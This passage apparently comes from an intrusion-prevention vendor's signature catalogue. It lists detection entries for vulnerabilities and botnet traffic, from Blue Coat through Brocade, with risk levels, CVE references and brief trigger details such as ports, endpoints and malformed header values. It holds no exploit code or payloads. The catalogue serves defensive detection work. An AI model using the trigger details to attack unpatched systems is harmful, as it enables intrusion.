Type: Buffer Overflow
Description: A buffer overflow vulnerability in Blue Coat BCAAA which allows remote attackers to execute arbitrary code by sending a malicious request to tcp port 16102/TCP.
Situation: Generic_CS-Blue-Coat-BCAAA-Stack-Buffer-Overflow
Back to top

Blue-Coat-WinProxy-Host-Header-Buffer-Overflow

About this vulnerability: Host header parsing buffer overflow vulnerability in Blue Coat WinProxy
Risk: High
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Blue Coat Systems WinProxy
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Blue Coat Systems WinProxy version 6.0 (and possibly in earlier versions). The software fails to validate the length of the user supplied host header field before copying it into static buffers. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim host.
Situation: HTTP_CSH-Blue-Coat-WinProxy-Host-Header-Buffer-Overflow
References:
CVE-2005-4085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4085
BID-16147
http://www.securityfocus.com/bid/16147
Back to top

Blueimp-jQuery-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Blueimp
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blueimp
Type: Insecure Configuration
Description: A vulnerability in Blueimp, versions 9.22.0 and before, which allows remote attackers to upload arbitrary files through the sample PHP upload handler in the jQuery File Upload widget.
Situation: HTTP_CS-Blueimp-jQuery-Arbitrary-File-Upload
References:
CVE-2018-9206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9206
Back to top

Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE

About this vulnerability: A vulnerability in BMC BladeLogic Server Automation
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: BMC BladeLogic Server Automation
Type: Insecure Configuration
Description: A vulnerability in BMC BladeLogic Server Automation, versions 8.2.x, 8.3.x, 8.5.x, 8.6.x, and 8.7.x, which allows remote attackers to run arbitrary system commands without authentication due to the weak access control check in the RSCD agent.
Situation: Generic_CS-Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE
References:
CVE-2016-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1543
Back to top

Bmc-Patrol-Agent-Command-Execution

About this vulnerability: A vulnerability in BMC Patrol Agent
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: BMC Patrol Agent
Type: Input Validation
Description: A vulnerability in BMC Patrol Agent which allows remote attackers to execute arbitrary code due to insufficient input validation.
Situation: Generic_CS-Bmc-Patrol-Agent-Command-Execution
References:
CVE-2018-20735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20735
Back to top

Bmc-Track-It-Arbitrary-File-Upload

About this vulnerability: A Bmc Track-It Arbitrary File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BMC TrackIt
Type: Directory Traversal
Description: A vulnerability in BMC TrackIt, version 11.3.0.355, which allows remote attackers to upload arbitrary files, execute arbitrary code, and obtain sensitive information via a .NET remoting request to FileStorageService or ConfigurationService.
Situation: Generic_CS-Bmc-Track-It-Arbitrary-File-Upload
References:
CVE-2014-4872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4872
OSVDB-112741
http://www.osvdb.org/112741
Back to top

Bmc-TrackIt-Password-Reset

About this vulnerability: A BMC TrackIt Password Reset vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BMC TrackIt
Type: Insecure Configuration
Description: A vulnerability in BMC TrackIt, version 11.3, which allows remote attackers to reset domain credentials, gain privileges and possibly execute arbitrary code.
Situation: HTTP_CSU-Bmc-TrackIt-Password-Reset
References:
CVE-2014-8270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8270
Back to top

BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

About this vulnerability: BMP header parsing vulnerability in Windows Media Player (MS06-005)
Risk: High
First detected in: sgpkg-ips-59-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Buffer Overflow
Description: Windows Media Player does not parse BMP files correctly. A BMP header with a DataOffset value lower than 0x0e will cause an integer underflow and a buffer overflow, allowing arbitrary code execution.
Situation: HTTP_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
E-Mail_BS-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
File-Binary_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
References:
CVE-2006-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006
BID-16633
http://www.securityfocus.com/bid/16633
MS06-005
http://technet.microsoft.com/security/bulletin/MS06-005
Back to top

Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833

About this vulnerability: A vulnerability in Boa Web Server
Risk: High
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: Boa Web Server
Type: Input Validation
Description: An arbitrary file read vulnerability has been reported in Boa Web Server 0.94.14. A remote attacker could use this to disclose information which could be used to further compromise the server. Note that the CVE entry has been marked as disputed due to multiple third parties reporting that only certain cameras are vulnerable.
Situation: HTTP_CSU-Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833
References:
CVE-2017-9833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9833
Back to top

Bobax

About this vulnerability: Bobax
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Bobax is a Botnet used for sending spam messages.
Situation: HTTP_CSU-Bobax-Activity
Back to top

BoidCMS-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in BoidCMS detected.
Risk: High
First detected in: sgpkg-ips-1702-5242
Last changed: sgpkg-ips-1702-5242
Platform: Linux; Windows
Software: BoidCMS
Type: Input Validation
Description: A vulnerability in BoidCMS, versions 2.0.0 and before, which allows users to upload and execute php files as media if the file has the GIF header, due to insufficient input validation.
Situation: HTTP_CS-BoidCMS-Command-Injection
References:
CVE-2023-38836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38836
Back to top

BolinTech-Dream-FTP-Server-Format-String

About this vulnerability: A BolinTech Dream FTP Server Format String vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DreamFTP
Type: Input Validation
Description: A vulnerability in BolinTech Dream FTP Server, version 1.02, which allows remote attackers to cause a denial of service condition via format string specifiers in the PASS, RETR, and USER commands.
Situation: FTP_CS-BolinTech-Dream-FTP-Server-Format-String
References:
CVE-2004-2074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2074
BID-9800
http://www.securityfocus.com/bid/9800
OSVDB-4986
http://www.osvdb.org/4986
Back to top

Bolt-CMS-Authenticated-Remote-Code-Execution

About this vulnerability: A vulnerability in Bolt CMS.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Unix; Linux
Software: Bolt CMS
Type: Input Validation
Description: A vulnerability in Bolt CMS, versions 3.7.0 and 3.6.*, which allows remote attackers to execute arbitrary code by uploading malicious php files via POST requests to /async/folder/rename. The files can then be executed with a GET request to the malicious file.
Situation: HTTP_CS-Bolt-CMS-Authenticated-Remote-Code-Execution
Back to top

Bomberclone-Buffer-Overflow

About this vulnerability: A Bomberclone Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Bomberclone
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Bomberclone, version 0.11.6, which allows remote attackers to execute arbitrary code via long error messages.
Situation: Generic_UDP-Bomberclone-Buffer-Overflow
References:
CVE-2006-0460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0460
BID-16697
http://www.securityfocus.com/bid/16697
OSVDB-23263
http://www.osvdb.org/23263
Back to top

Bookedspace

About this vulnerability: BookedSpace
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BookedSpace
Type: Misconfiguration
Description: BookedSpace is an adware that will generate pop-up ads while you browse the internet. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Bookedspace
HTTP_CSH-Bookedspace
Back to top

BOOTP-Daemon-Long-Filename-BOF

About this vulnerability: A buffer overflow vulnerability in Bootp filename
Risk: Moderate
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: bootpd
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Bootp daemon versions 2.4.3 and older. Passing a long filename parameter may result in system compromise.
Situation: BOOTP_CS-BOOTP-Daemon-Long-Filename-BOF
References:
CVE-1999-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0799
Back to top

BOOTP-Sun-Solaris-in.dhcpd-Malformed-Packet

About this vulnerability: A buffer overflow vulnerability in Sun Solaris in.dhcpd
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: bootpd
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Sun Solaris in.dhcpd, which is triggered by BOOTP packets with non-null value in the ciaddr field.
Situation: BOOTP_CS-Sun-Solaris-in.dhcpd-Malformed-Packet
References:
BID-5190
http://www.securityfocus.com/bid/5190
Back to top

Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal

About this vulnerability: A vulnerability in Borland AccuRev
Risk: Moderate
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Borland AccuRev
Type: Directory Traversal
Description: There exists a denial of service and an information disclosure vulnerability in the Borland AccuRev. A remote attacker can use this to read or delete files on the affected system.
Situation: HTTP_CRL-Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal
Back to top

Borland-Interbase-Database-Message-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Borland Software InterBase
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Borland Interbase
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Borland InterBase Server. The vulnerability is due to lack of boundary protection while processing Connect requests (Opcode 0x01). A remote unauthenticated attacker can send a crafted request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally System on Windows platforms. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Successful attack could allow for arbitrary code being executed with the privileges of the affected service, which is normally System on Windows platforms. In the case of an unsuccessful code execution attack, the affected service will terminate resulting in a denial of service condition.
Situation: Generic_CS-Borland-Interbase-Database-Message-Handling-Buffer-Overflow
References:
BID-29302
http://www.securityfocus.com/bid/29302
Back to top

Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Borland InterBase Server
Risk: High
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Borland Interbase
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Borland InterBase Server. A crafted request with a malicious payload allows the compromise of a vulnerable system.
Situation: Generic_Borland-Interbase-Database-Service-Malformed-Request-BOF-2
Generic_Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow
References:
CVE-2007-3566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3566
BID-25048
http://www.securityfocus.com/bid/25048
OSVDB-38602
http://www.osvdb.org/38602
Back to top

Borland-Interbase-Integer-Overflow-Vulnerability

About this vulnerability: Integer overflow vulnerability in Borland Interbase
Risk: Moderate
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux;Windows
Software: Borland Interbase
Type: Buffer Overflow
Description: Borland Interbase suffers from an integer overflow vulnerability. The vulnerability allows remote attackers to cause a stack-based buffer overflow, and can be used to execute arbitrary code on a vulnerable server.
Situation: Generic_Borland-Interbase-Integer-Overflow
References:
CVE-2008-2559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2559
BID-29302
http://www.securityfocus.com/bid/29302
Back to top

Borland-Interbase-Multiple-Remote-Buffer-Overflows

About this vulnerability: Multiple buffer overflow vulnerabilities in Borland Interbase
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux;Windows
Software: Borland Interbase
Type: Buffer Overflow
Description: Borland Interbase suffers from multiple stack-based buffer overflow vulnerabilities. Crafted requests can be sent by remote attackers to tcp port 3050 on vulnerable systems, potentially leading to arbitrary code execution.
Situation: Generic_CS-Borland-Interbase-INET-Connect-Buffer-Overflow
Generic_CS-Borland-Interbase-SVC-Attach-Buffer-Overflow
Generic_CS-Borland-Interbase-Jrd8-Create-Database-Buffer-Overflow
Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow
References:
CVE-2007-5243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5243
BID-25917
http://www.securityfocus.com/bid/25917
OSVDB-38609
http://www.osvdb.org/38609
OSVDB-38608
http://www.osvdb.org/38608
OSVDB-38607
http://www.osvdb.org/38607
OSVDB-38606
http://www.osvdb.org/38606
OSVDB-38605
http://www.osvdb.org/38605
Back to top

Borland-Interbase-Open-Marker-File-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Borland Interbase open_marker_file function
Risk: Moderate
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux;Windows
Software: Borland Interbase
Type: Buffer Overflow
Description: The open_marker_file function in Borland Interbase suffers from a stack-based buffer overflow vulnerability. The vulnerability can be exploited with crafted requests over TCP port 3050, and allows arbitrary code execution on the vulnerable system.
Situation: Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow
References:
CVE-2007-5244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5244
BID-25917
http://www.securityfocus.com/bid/25917
OSVDB-38610
http://www.osvdb.org/38610
Back to top

Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF

About this vulnerability: A buffer overflow vulnerability in Borland InterBase Server
Risk: High
First detected in: sgpkg-ips-152-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Borland Interbase
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Borland InterBase Server. A remote attacker can send a crafted Service Attach request to the vulnerable server to terminate the affected service to cause a denial of service condition or to execute arbitrary code with the privileges of the affected service, normally System on Windows systems.
Situation: Generic_CS-Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF
References:
CVE-2008-1910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1910
BID-28730
http://www.securityfocus.com/bid/28730
OSVDB-44455
http://www.osvdb.org/44455
Back to top

Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Borland StarTeam Multicast Service
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Borland StarTeam Multicast Service; Borland CaliberRM; Borland StarTeam
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Borland StarTeam Multicast Service.
Situation: HTTP_CS-Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow
References:
CVE-2008-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0311
BID-28602
http://www.securityfocus.com/bid/28602
Back to top

Bot:-Dirtjumper-Traffic-Detected

About this vulnerability: DirtJumper Traffic
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: DirtJumper is a Windows malware.
Situation: HTTP_CSH-Dirtjumper-Traffic
HTTP_CRL-Dirtjumper-Traffic
Back to top

Botnet-Command-And-Control

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-CnC-Traffic-Detected
Back to top

Botnet-Fareit

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Fareit-Traffic-Detected
File-Binary_Fareit-A-Botnet-Traffic
Back to top

Botnet-Fynloski

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Generic_SS-Fynloski-Botnet-Traffic
Back to top

Botnet-Ghost

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1550-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Ghost-Traffic-Detected
Generic_CS-Ghost-Activity
Back to top

Botnet-Kuluoz

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Kuluoz-Traffic-Detected
File-Binary_Kuluoz-Botnet-Traffic
Back to top

Botnet-Nitol

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Nitol-Traffic-Detected
Generic_CS-Nitol-Activity-2
Back to top

Botnet-njRAT

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: NJRat is a malicious botnet which is a serious threat to Internet users. Most notably, NJRat engages in trojan activity and allows remote backdoor access to infected computers. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation: Generic_CS-njRAT-Activity
Back to top

Botnet-Palevo

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Palevo-Traffic-Detected
Generic_UDP-Palevo-Activity
Back to top

Botnet-PoisonIvy

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: PoisonIvy is a malicious botnet. Infected computers are subject to a variety of remote control functionality, ranging from remote administration to surveillance. Infections of PoisonIvy should be handled immediately.
Situation: Generic_SS-PoisonIvy-Activity
Back to top

Botnet-Pramro

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Pramro-Traffic-Detected
Back to top

Botnet-Pushdo

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Pushdo-Traffic-Detected
Generic_CS-Pushdo-B-Activity
Back to top

Botnet-Ramnit

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Ramnit-Traffic-Detected
Generic_CS-Ramnit-Activity
Back to top

Botnet-Sality_NonP2P

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Sality_NonP2P-Traffic-Detected
File-Binary_Sality-NonP2P-A-Botnet-Traffic
Back to top

Botnet-Sality_P2P

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Sality_P2P-Traffic-Detected
Back to top

Botnet-Smokeloader

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1365-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Smokeloader-Traffic-Detected
HTTP_CS-Smokeloader-Malware-Infection-Traffic
File-Binary_Smokeloader-C-Botnet-Traffic
File-Binary_Smokeloader-A-Botnet-Traffic
Back to top

Botnet-Teslacrypt

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: File-Text_Teslacrypt-Botnet-Traffic
Back to top

Botnet-Tofsee

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Tofsee-Traffic-Detected
Generic_SS-Tofsee-Activity
Back to top

Botnet-Virut

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Virut-Traffic-Detected
Back to top

Botnet-Vobfus

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Vobfus-Traffic-Detected
Back to top

Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query

About this vulnerability: A Botnet Win32 Backdoor Zmcwinsvc DNS Query detected
Risk: High
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: A common domain used in DNS requests from Win32.Backdoor.Zmcwinsvc has been detected.
Situation: DNS-UDP_Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query
Back to top

Botnet-Yoddos

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Yoddos-Traffic-Detected
Generic_SS-Yoddos-Activity
Generic_CS-Yoddos-Activity
Back to top

Botnet-ZeroAccess

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Back to top

Botnet-Zeus_P2P

About this vulnerability: Probable botnet command and control traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Probable botnet command and control traffic was detected
Situation: Botnet-Zeus_P2P-Traffic-Detected
Back to top

Bredolab-Bot

About this vulnerability: Bredolab bot
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Bredolab is a Windows malware that can be remote controlled.
Situation: HTTP_CSH-Bredolab-Bot-Activity
HTTP_CSU-Bredolab-Bot-Activity
Back to top

BrightStor-Arcserve-Backup-Agent-For-MSSQL-BOF

About this vulnerability: Buffer overflow vulnerability in Veritas Backup Agent for MSSQL
Risk: High
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: There exists a stack based buffer overflow in BrightStor ARCserve and Enterprise Backup Agent for MSSQL. The vulnerability is caused due to a boundary error in the Backup Agents. A remote attacker can exploit this vulnerability to cause a denial of service condition or execute arbitrary code with the privileges of the currently running server, normally System.
Situation: Generic_CS-CA-Arcserve-Backup-For-Windows-BOF
References:
CVE-2005-1272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272
BID-14453
http://www.securityfocus.com/bid/14453
OSVDB-18501
http://www.osvdb.org/18501
Back to top

BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-Servicepc-BOF

About this vulnerability: Buffer overflow in ARCServe/Enterprise Backup Discovery Service
Risk: High
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor ARCServe and Enterprise Backup are vulnerable to a buffer overflow in its Discovery Service. A remote attacker could send a crafted TCP packet to the vulnerable server to execute arbitrary code on the server.
Situation: Generic_BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-BOF
References:
CVE-2005-2535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2535
BID-12536
http://www.securityfocus.com/bid/12536
OSVDB-13814
http://www.osvdb.org/13814
Back to top

BrightStor-Arcserve-Enterprise-Backup-UDP-BOF

About this vulnerability: Buffer overflow in BrightStor ARCServe/Enterprise Backup
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor ARCServe and Enterprise Backup are vulnerable to a buffer overflow caused by improper bounds checking of user-supplied data. A remote attacker can exploit this to execute arbitrary code on the server.
Situation: Generic_CA-BrightStor-Arcserve-Enterprise-Backup-UDP-BOF
References:
CVE-2005-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260
BID-12491
http://www.securityfocus.com/bid/12491
OSVDB-13613
http://www.osvdb.org/13613
Back to top

Broadcastpc

About this vulnerability: BroadcastPC
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BroadcastPC
Type: Misconfiguration
Description: BroadcastPC is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Broadcastpc
Back to top

Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption

About this vulnerability: A vulnerability in Broadwin Technology WebAccess Client
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Broadwin WebAccess Client
Type: Format String
Description: A memory corruption vulnerability exists in an ActiveX component of Broadwin Technology's WebAccess client. The vulnerability is due to a lack of validation of the WriteTextData() and CloseFile() methods' arguments.
Situation: File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption
References:
CVE-2012-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0241
BID-52051
http://www.securityfocus.com/bid/52051
OSVDB-74898
http://www.osvdb.org/74898
Back to top

Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String

About this vulnerability: A vulnerability in Broadwin Technology WebAccess Client
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Broadwin WebAccess Client
Type: Format String
Description: A format string vulnerability exists in an ActiveX component of Broadwin Technology's WebAccess client. The vulnerability is due to a lack of validation of the OcxSpool() method's argument. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String
References:
CVE-2012-0242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0242
BID-52051
http://www.securityfocus.com/bid/52051
OSVDB-74897
http://www.osvdb.org/74897
Back to top

Broadwin-WebAccess-Denial-Of-Service

About this vulnerability: Broadwin WebAccess Denial Of Service
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Broadwin WebAccess Server
Type: Malfunction
Description: A vulnerability in Broadwin WebAccess that allows a remote attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-Broadwin-WebAccess-Denial-Of-Service
Back to top

Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Brocade Network Advisor
Risk: Moderate
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Brocade Network Advisor
Type: Directory Traversal
Description: Improper path validation results in a directory traversal vulnerability in Brocade Network Advisor. A successfull attack can result in system-privileged file system read access.
